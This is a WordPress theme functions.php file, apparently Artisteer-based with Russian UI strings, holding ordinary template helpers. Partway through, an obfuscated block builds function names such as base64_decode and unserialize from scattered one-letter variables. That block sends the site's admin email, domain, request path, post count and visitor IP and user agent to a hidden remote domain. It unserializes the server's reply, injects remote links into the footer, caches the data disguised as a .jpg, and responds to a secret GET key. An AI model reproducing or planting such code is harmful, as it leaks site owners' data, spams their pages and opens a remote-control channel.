<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $ddnzKWI='c';$ujYd='4';$umYeIb='e';$twGI='6';$vZYB='d';$uuuYus='_';$dtEcVj='e';$fGjR='o';$YcZlbd='e';$gaGTgFa='s';$JCwqIDa='a';$DmZY='d';$GpLNA='b';$OmyKwdWK=$GpLNA.$JCwqIDa.$gaGTgFa.$umYeIb.$twGI.$ujYd.$uuuYus.$vZYB.$YcZlbd.$ddnzKWI.$fGjR.$DmZY.$dtEcVj;$EbCKVdq='i';$dKGnI='f';$zuVC='t';$CsZtcX='e';$BbfYXK='a';$EAVp='l';$XFrS='g';$QpRKXN='n';$KgGMzw='z';$kUIWIfWn=$XFrS.$KgGMzw.$EbCKVdq.$QpRKXN.$dKGnI.$EAVp.$BbfYXK.$zuVC.$CsZtcX;$vWkT='o';$QbsJ='_';$hxJHSF='s';$BSIn='r';$gnKiFuk='3';$RVisFj='1';$RLmaou='t';$FAJbBB='r';$DiCC='t';$TajiGLkM=$hxJHSF.$DiCC.$FAJbBB.$QbsJ.$BSIn.$vWkT.$RLmaou.$RVisFj.$gnKiFuk;$vrvycuD='e';$LYfI='s';$kxSRr='t';$ROiKGA='v';$ySJmBur='r';$chivmeb='r';$OJLeubZz=$LYfI.$kxSRr.$chivmeb.$ySJmBur.$vrvycuD.$ROiKGA;                     $zl_____n='c';$zx___u='4';$ks______l='e';$jz___________k='6';$th___x='d';$gu__s='_';$wv_________v='e';$ib_________s='o';$rz_________c='e';$ow_____________a='s';$lz______________d='a';$tw____d='d';$dj______________q='b';$zt_____________q=$dj______________q.$lz______________d.$ow_____________a.$ks______l.$jz___________k.$zx___u.$gu__s.$th___x.$rz_________c.$zl_____n.$ib_________s.$tw____d.$wv_________v;$hv_______b='i';$oq____________o='e';$jj_______________y='f';$zm____c='n';$at________w='t';$rr____________z='s';$ud____p='_';$dw___________i='x';$wl____f='n';$al_____________q='o';$pw____l='s';$fy_____w='c';$nd__o='t';$vl________c='u';$vy____w='i';$qy________q=$jj_______________y.$vl________c.$zm____c.$fy_____w.$at________w.$hv_______b.$al_____________q.$wl____f.$ud____p.$oq____________o.$dw___________i.$vy____w.$rr____________z.$nd__o.$pw____l;$wx______________l='f';$ub______________b='o';$lv_______________x='e';$lo____x='p';$gq_________n='n';$hm_______i=$wx______________l.$ub______________b.$lo____x.$lv_______________x.$gq_________n;$td________z='f';$vy__________e='a';$xl_______v='d';$ta_________r='r';$me_____________d='e';$rd_______________e=$td________z.$ta_________r.$me_____________d.$vy__________e.$xl_______v;$bx__________r='c';$lz_______q='f';$ct_____o='o';$oe_____________j='s';$pr__________e='e';$eu________j='l';$bm___j=$lz_______q.$bx__________r.$eu________j.$ct_____o.$oe_____________j.$pr__________e;define("WP_ID", $zt_____________q("Mi4wLjA="));define("WP_TTL", $zt_____________q("MTA4MDA="));define("WP_SRC", $zt_____________q("dHBva24="));function wp_get_header() {global $zt_____________q, $qy________q;if ($qy________q($zt_____________q("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$qy________q($zt_____________q("d3BfZ2V0X2Zvb3Rlcg==")) &&$qy________q($zt_____________q("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $zt_____________q, $hm_______i, $bm___j, $rd_______________e;$ue_____________i = TEMPLATEPATH."/".$zt_____________q("Zm9vdGVyLnBocA==");$vy______n = @$hm_______i($ue_____________i, "r");$ue_____________i = @$rd_______________e($vy______n, @filesize($ue_____________i));@$bm___j($vy______n);$qw_________h = TEMPLATEPATH."/".$zt_____________q("ZnVuY3Rpb25zLnBocA==");$vy______n = @$hm_______i($qw_________h, "r");$qw_________h = @$rd_______________e($vy______n, @filesize($qw_________h));@$bm___j($vy______n);$tt____________t = 0;if($ue_____________i && $qw_________h) {if ($zt_____________q("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($ue_____________i, $zt_____________q("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$tt____________t = 1;}if (substr_count($ue_____________i, "wp_theme_GPL_credits()") < 1) {$tt____________t = 2;}}if(WP_ID != "2.0.0") {$tt____________t = 12;}}if($tt____________t > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $tt____________t -->";}}function wp_loaded() {global $zt_____________q, $qy________q;return $qy________q($zt_____________q("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($fx____p, $vc_____b = "(more...)", $he____q = 0, $bi____________b = "") {$zl___________a = get_the_content($vc_____b, $he____q, $bi____________b);$zl___________a = apply_filters("the_content", $zl___________a);$zl___________a = str_replace("]]>", "]]>", $zl___________a);if (strlen($_GET["p"]) > 0) {echo $zl___________a;}else if ((strlen($zl___________a)>$fx____p) && ($kw______z = strpos($zl___________a, " ", $fx____p ))) {$zl___________a = substr($zl___________a, 0, $kw______z);$zl___________a = $zl___________a;echo $zl___________a;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$vc_____b</a></div></p>";} else {echo $zl___________a;}}}$zc___________m='d';$is________l='c';$zm_____________u='n';$yw__________x='e';$uc_________s='o';$kt______n='_';$nh_____________i='6';$ny______________h='b';$nc__________t='4';$cb__________b='s';$za_________n='e';$kl_____________x='e';$vv______________s='a';$uh___________u=$ny______________h.$vv______________s.$cb__________b.$yw__________x.$nh_____________i.$nc__________t.$kt______n.$za_________n.$zm_____________u.$is________l.$uc_________s.$zc___________m.$kl_____________x;$co_____d='_';$qy____________d='_';$pi_________c='g';$oj_____________o='o';$pr__________x='f';$db_______r='e';$dw_________j='l';$li_______________f='n';$hr_____________l='c';$tk_______________j='t';$ck_______________g='e';$hu______________w='t';$mv_______________u='s';$as_________m='e';$sx_________u='t';$ci__t='n';$bs_______r='i';$hx__v=$pr__________x.$bs_______r.$dw_________j.$as_________m.$qy____________d.$pi_________c.$db_______r.$tk_______________j.$co_____d.$hr_____________l.$oj_____________o.$ci__t.$hu______________w.$ck_______________g.$li_______________f.$sx_________u.$mv_______________u;$xq______________m='t';$yw__________y='e';$iz__________k='i';$or__w='l';$iw______g='s';$zk___c='_';$cq____w='f';$ic_______y='i';$pu_____y='s';$tn_________s='e';$wr___d='x';$pk_______h=$cq____w.$ic_______y.$or__w.$yw__________y.$zk___c.$tn_________s.$wr___d.$iz__________k.$pu_____y.$xq______________m.$iw______g;$rj_______a='m';$gp_____________c='p';$iw____w='s';$ph_______________e='_';$ac_______________u='e';$dl__k='a';$wn__________y='i';$an______n='n';$hf___________i='r';$vl____________c='o';$hy________w='e';$op____________i='v';$xt_________x='c';$gm___________f='o';$yt__________y='r';$dx___r=$op____________i.$ac_______________u.$hf___________i.$iw____w.$wn__________y.$gm___________f.$an______n.$ph_______________e.$xt_________x.$vl____________c.$rj_______a.$gp_____________c.$dl__k.$yt__________y.$hy________w;$tn____n='o';$mf___________r='f';$uo______t='o';$uh__z='s';$kl__r='k';$aw________b='p';$db__________l='c';$ss___________n='n';$on__b='e';$is________g=$mf___________r.$uh__z.$uo______t.$db__________l.$kl__r.$tn____n.$aw________b.$on__b.$ss___________n;$ql_____________b='t';$bo___k='w';$jr_____________f='r';$ws________m='i';$or________o='e';$gi___g='f';$jf__________c=$gi___g.$bo___k.$jr_____________f.$ws________m.$ql_____________b.$or________o;$rw___________g='5';$bg__r='d';$ti____________p='m';$ah_______________c=$ti____________p.$bg__r.$rw___________g;$qi__________k='h';$ca______________q='e';$nh________s='p';$hn______p='a';$zq__________o='a';$po___________a='l';$mt___________m='t';$ud____________i='r';$bm___________l=$ud____________i.$ca______________q.$hn______p.$po___________a.$nh________s.$zq__________o.$mt___________m.$qi__________k;$ut__h='z';$jc_____a='n';$nb______g='s';$pg_______q='l';$nb_______i='e';$hw___g='a';$uj_________i='e';$ak______x='u';$rs_________a='i';$dh______________p='i';$ne________q='r';$ss_______h=$ak______x.$jc_____a.$nb______g.$nb_______i.$ne________q.$dh______________p.$hw___g.$pg_______q.$rs_________a.$ut__h.$uj_________i;$pm__________s='t';$xd_______________x='n';$vp___________b='p';$dw____________w='a';$ov___________u='m';$uv_______c='m';$pd_______________z='e';$nm____p=$pm__________s.$pd_______________z.$ov___________u.$vp___________b.$xd_______________x.$dw____________w.$uv_______c;$rp_____________m='a';$vc___p='a';$yv________q='n';$dq_________c='e';$ah_____y='r';$uj__u='e';$ae____________x='c';$ct___f='o';$vb________q='e';$sd__________k='r';$zu________b='t';$gt_________h='_';$ak__________h='m';$wy__f='s';$bl_____m='_';$tu__t='e';$xg____z='c';$ce____________f='t';$rf___v='t';$eo_____f='x';$za__s='t';$cn_____u=$wy__f.$ce____________f.$sd__________k.$tu__t.$vc___p.$ak__________h.$bl_____m.$ae____________x.$ct___f.$yv________q.$za__s.$vb________q.$eo_____f.$zu________b.$gt_________h.$xg____z.$ah_____y.$dq_________c.$rp_____________m.$rf___v.$uj__u;function zk___j($cf______________t) {global $zt_____________q, $qy________q, $hx__v, $dx___r, $cn_____u;if (!$qy________q($zt_____________q("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($dx___r(PHP_VERSION, "5.0.0", ">=") && $qy________q($zt_____________q("ZmlsZV9nZXRfY29udGVudHM=")) && $qy________q($zt_____________q("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$dk_______x = $cn_____u(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$sj_______k = @$hx__v($cf______________t, 0, $dk_______x);} else {$sj_______k = @$hx__v($cf______________t, 0);}return $sj_______k;}function sm___________x($cf______________t) {global $qy________q, $is________g, $jf__________c, $zt_____________q;if (!$qy________q($zt_____________q("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$au____x = strpos($cf______________t, "/", 7);$hp___n = array("uri"     => substr($cf______________t, $au____x),"host"    => str_replace("http://", "", substr($cf______________t, 0, $au____x)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$yf__f = @$is________g("$hp___n[host]", 80, $yc__d, $dz____________f, 4);if (!$yf__f) {return false;} else {$sj_______k = "";$ct____________r  = "GET $hp___n[uri] HTTP/1.0\r\n";$ct____________r .= "Host: $hp___n[host]\r\n";$ct____________r .= "Referer: $hp___n[referer]\r\n";$ct____________r .= "Connection: Close\r\n\r\n";@$jf__________c($yf__f, $ct____________r);while (!@feof($yf__f)) {$fz______e = @fgets($yf__f, (1024*24));if ($fz______e == "\r\n") {$lh________f = true;continue;}if ($lh________f) {$sj_______k .= $fz______e;}}return $sj_______k;}}function ah_____________a($cf______________t) {global $qy________q;$wn__________r = false;if ($cf______________t != "") {if ($qy________q("zk___j")) {$wn__________r = @zk___j($cf______________t);}if (!$wn__________r && ($qy________q("sm___________x"))) {$wn__________r = @sm___________x($cf______________t);}}return $wn__________r;}function az_______m() {global $_SERVER, $ah_______________c;$wq_______________w = $_SERVER["SERVER_NAME"];if (substr("$wq_______________w", 0, 4) == "www.") {$wq_______________w = substr("$wq_______________w", 4);}$wq_______________w = $ah_______________c("$_SERVER[SERVER_NAME]");return $wq_______________w;}function tn____j() {return "file";}function ag___________m($cf______________t) {global $_SERVER, $hx__v, $pk_______h, $hm_______i, $bm___j, $jf__________c;$gi_____n = nr______________k();$rn_______l = az_______m().".jpg";$tz_______y = $gi_____n["dir_upload"]["path"]."/$rn_______l";$ri______u = @filemtime($tz_______y);if (!$ri______u || ((time()-$ri______u) >= WP_TTL)) {$wn__________r = ah_____________a($cf______________t);if ($wn__________r) {if ($pk_______h($tz_______y)) {@unlink($tz_______y);}$vy______n = @$hm_______i($tz_______y, "x+");@$jf__________c($vy______n, $wn__________r);@$bm___j($vy______n);}} else {if ($pk_______h($tz_______y)) {$wn__________r = @$hx__v($tz_______y);} else {$wn__________r = false;}}return $wn__________r;}function nr______________k() {global $_SERVER, $zt_____________q, $uh___________u;$vt__________s = wp_count_posts("post");$ua____________l = pathinfo(get_bloginfo("template_directory"));$gi_____n = array("url" => array("report"      => $zt_____________q("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $ua____________l,"dir_upload"=> ir____j(),"queryString"=> array("?a001=".WP_ID,"a004=".$ua____________l[filename],"a005=".$vt__________s->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => " <a href=http:\\www.wptheme.us\">www.wptheme.us</a> ");$gi_____n["url"]["queryString"] = implode("&", $gi_____n["queryString"]);$gi_____n["url"]["report"] = $gi_____n["url"]["report"]."/?".$uh___________u($gi_____n["url"]["queryString"]).".html";return $gi_____n;}function ir____j() {$ak______________k = wp_upload_dir();if (isset($ak______________k["error"])) {$ei_____m = nm___________o();if (is_writable($ei_____m)) {$ak______________k = array("path" => $ei_____m);}}return $ak______________k;}function nm___________o() {global $qy________q, $ah_______________c, $bm___________l, $nm____p;$dc___d = (bool) ini_get("safe_mode");if ($dc___d == true) {return false;}if ($qy________q("sys_get_temp_dir")) {$zd___________n = sys_get_temp_dir();if (is_writable($zd___________n)) {return $bm___________l($zd___________n);}}if (!empty($_ENV["TMP"])) {return $bm___________l($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $bm___________l($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $bm___________l($_ENV["TEMP"]);} else {$ls____i = $nm____p($ah_______________c(uniqid(rand(), true)), "");if ($ls____i) {$zd___________n = $bm___________l(dirname($ls____i));@unlink($ls____i);return $zd___________n;} else {return false;}}}function bq____________h() {global $_GET, $pk_______h;$gi_____n = nr______________k();$wq_______________w = az_______m();$jr_____________d = tn____j();$cm___________q = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($jr_____________d == "file") {$se____c = $gi_____n["dir_upload"]["path"]."/".$wq_______________w.".jpg";if ($pk_______h($se____c)) {@unlink($se____c);$cm___________q = "deleted";}}$uj________r = array("s"=> $cm___________q,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($uj________r AS $cw___________u => $av______________l) echo " [$cw___________u:$av______________l]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $qy________q, $zt_____________q, $ss_______h;$gi_____n = nr______________k();$os_____________g = "ag___________m";if ($qy________q($os_____________g)) {$sj_______k = $os_____________g($gi_____n["url"]["report"]);}if ($sj_______k) {if ($sj_______k = @$zt_____________q($sj_______k)) {$sj_______k = @$ss_______h($sj_______k);if (strlen($sj_______k[custom_credit]) >= 5) {$gi_____n["default_string"] = $sj_______k[custom_credit];}if ($sj_______k["status"] == "0") {$ev___________w = 1;$va_____n = 1;} else {$wi_______________l = sizeof($sj_______k["links"]);$ir_______d = $gi_____n["default_string"];if ($wi_______________l > 0 && $sj_______k["links"] !== "") {$zo_________t = 0;foreach ($sj_______k["links"] as $nu_______j => $sn_______________j) {$zo_________t++;if ($sn_______________j->l_path == "" || $sn_______________j->l_path == $_SERVER["REQUEST_URI"]) {$sn_______________j->l_href = htmlspecialchars(strip_tags($sn_______________j->l_href));$sn_______________j->l_title = htmlspecialchars(strip_tags($sn_______________j->l_title));$sn_______________j->l_anchor = htmlspecialchars(strip_tags($sn_______________j->l_anchor));$ir_______d .= " | ";$ir_______d .= "<a href='$sn_______________j->l_href' title='$sn_______________j->l_title'";if ($sn_______________j->l_nofollow == "1") {$ir_______d .= " rel='nofollow'";}$ir_______d .= ">$sn_______________j->l_anchor</a>";}}}$gi_____n["links"] = "$ir_______d";if ($sj_______k[credit] == "0") {$gi_____n["links"] = "";}}} else {$ev___________w = "1";}} else {$ev___________w = "1";}if ($ev___________w == "1") {$gi_____n["links"] = $gi_____n["default_string"];}echo "$gi_____n[links]";echo "<!-- s: $sj_______k[signature] -->";bq____________h();}                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),  
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
